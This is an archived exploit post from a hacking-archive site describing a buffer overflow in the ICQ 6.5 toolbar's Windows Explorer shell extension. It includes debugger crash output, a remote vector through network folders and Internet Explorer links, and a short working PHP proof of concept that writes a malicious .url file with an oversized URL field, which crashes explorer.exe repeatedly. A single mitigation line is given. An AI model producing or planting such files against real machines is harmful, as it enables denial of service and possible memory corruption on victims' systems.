AOH :: HP Unsorted I :: BT-21041.HTM

ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer rmt buf overflow



ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc



http://retrogod.altervista.org/=0D 
=0D
If the resulting file is placed on the desktop, against ex. xp sp3=0D
process explorer.exe will exit with code 1282 (0x502) that is=0D
ERROR_STACK_BUFFER_OVERRUN and crash infinitely, you cannot even browse a folder=0D
if the file is present in it=0D
Solution: disable the shell extension, you may try shellexview by nirsoft=0D
=0D
Note (added 30/05/2009, remote vector added): it works with network folders=0D
too ...=0D
=0D
against a win2k3 where explorer.exe is not patched with /GS flag:=0D
=0D
(f44.104): Access violation - code c0000005 (first chance)=0D
First chance exceptions are reported before any exception handling.=0D
This exception may be expected and handled.=0D
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=00000823 esi=00610061 edi=00000000=0D
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0         nv up ei pl nz na po nc=0D
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202=0D
SHLWAPI!Ordinal400+0x2d:=0D
772a533f 668906          mov     word ptr [esi],ax        ds:0023:00610061=???? <-----=0D
0:010> g=0D
(f44.104): Access violation - code c0000005 (!!! second chance !!!)=0D
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=00000823 esi=00610061 edi=00000000=0D
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0         nv up ei pl nz na po nc=0D
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202=0D
SHLWAPI!Ordinal400+0x2d:=0D
772a533f 668906          mov     word ptr [esi],ax        ds:0023:00610061=???? <-----=0D
0:010> gn=0D
eax=00000001 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000001=0D
eip=7ffe0304 esp=0178fcf0 ebp=0178ff44 iopl=0         nv up ei pl zr na pe nc=0D
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246=0D
SharedUserData!SystemCallStub+0x4:=0D
7ffe0304 c3              ret=0D
=0D
prepare a network folder with the .url file inside. This works=0D
against Internet Explorer too by a hyperlink to the network folder=0D
*/=0D
=0D
$____x = "[InternetShortcut]\x0d\x0a".=0D
         "URL=".str_repeat("\x61",2184);=0D
file_put_contents("9sg_poc.url",$____x);=0D
?>=0D
=0D
#original url: http://retrogod.altervista.org/9sg_icq_dos.html 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.